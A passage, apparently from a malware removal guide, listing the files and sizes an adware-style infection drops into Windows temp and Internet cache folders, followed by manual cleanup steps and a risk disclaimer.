    %Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe (32816 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp (3526 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\310714_is.exe (44832 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe (64683 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].php (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\240714_ps[1].exe (33816 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\291014_nj[1].exe (110758 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_mb[1] (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe (64392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (6360 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_light.png (139 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\min.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code2.jpg (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code3.jpg (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\one.zip (127551 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code5.jpg (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\unchecked.png (135 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\uninstallDlg2.xml (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\UninstallManager.exe (60186 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\DataBase (26688 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\Thumbs.db (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bk_shadow.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\close.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code4.jpg (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button1.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowser.exe (5064 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg1.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\Thumbs.db (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\1[1].zip (229748 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\scrollbar.bmp (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\FBFDE863-3C17-4B82-A5D1-9B8ED5BE6B40.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checked.png (222 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\RegWrite.exe (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_bg.png (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox.png (545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code6.jpg (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\2[1].zip (325830 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox_select.png (783 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\479.json (512 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\conf (79 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code1.jpg (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg.png (5064 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\two.zip (255743 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\MessageBox.xml (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowserFrame.dll (3616 bytes)
    %WinDir%\Temp\CashReminder\mfs1A.tmp (408297 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\stores[1].htm (687 bytes)
    %WinDir%\Temp\P_StoreList.txt (687 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\rules[1].txt (265 bytes)
    %WinDir%\Temp\G_CheckUpdate.txt (8 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\rules[2].txt (16 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\update[1].htm (8 bytes)
    %WinDir%\Temp\G_RuleList.txt (16 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\rules[1].txt (94 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5M11A.tmp\310714_is.tmp (57 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\awhC.tmp (171 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\awhD.tmp (149648 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
